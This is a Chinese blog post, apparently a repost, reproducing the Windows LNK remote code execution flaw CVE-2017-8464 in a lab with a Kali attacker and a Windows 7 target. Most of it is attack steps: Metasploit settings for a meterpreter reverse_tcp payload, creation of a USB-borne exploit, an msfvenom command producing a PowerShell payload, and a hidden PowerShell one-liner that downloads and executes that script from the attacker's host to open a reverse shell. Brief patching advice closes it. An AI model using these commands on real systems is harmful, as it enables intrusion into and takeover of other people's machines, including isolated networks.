震网三代漏洞复现(CVE-2017-8464)

影响版本

Windows 7

Windows 8.1

Windows RT 8.1

Windows 10

Windows Server 2008

Windows Server 2008 R2

Windows Server 2012

Windows Server 2012 R2

Windows Server 2016

危害

被攻击机插入存在exp的U盘后会反弹shell,哪怕是被隔离的内网,也可以在不上网的情况下被攻击。

漏洞原理

当Windows搜索处理内存中的对象时,存在远程代码执行漏洞,攻击者可以利用此漏洞完全控制被攻击机。

漏洞复现

任务环境
  • 攻击机:Kali2019
  • 靶机:Win7 SP1
创建EXP
  • 打开MSF,使用CVE_2017_8464漏洞模块
    在这里插入图片描述
    在这里插入图片描述
  • 设置参数,LHOST(kali IP)、LPORT、payload

LHOST=192.168.1.106
LPORT=4444
payload=windows/meterpreter/reverse_tcp

在这里插入图片描述

  • 创建EXP,exp存放在/root/.msf4/local/下

在这里插入图片描述

获取靶机权限
  • 开启监听

在这里插入图片描述

  • 将存有EXP的U盘插入靶机,并执行cpl文件
    在这里插入图片描述
  • 获得权限
    在这里插入图片描述
利用Powershell获取权限
  • 生成攻击文件exp.ps1并移动到网站根目录
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.106 -f  psh-reflection>exp.ps1

在这里插入图片描述

  • 开启监听
    在这里插入图片描述
  • 打开靶机,新建一个快捷键
  • 输入构造的payload
powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString(‘http://192.168.1.106/exp.ps1‘);test.ps1"

在这里插入图片描述

  • 运行创建好的powershell.exe文件
    在这里插入图片描述
  • 获取权限

在这里插入图片描述

修复建议

更新Windows操作系统补丁
禁用USB自动播放
安装杀毒软件
发布了60 篇原创文章 · 获赞 68 · 访问量 8418

猜你喜欢

转载自blog.csdn.net/qq_43573676/article/details/104451467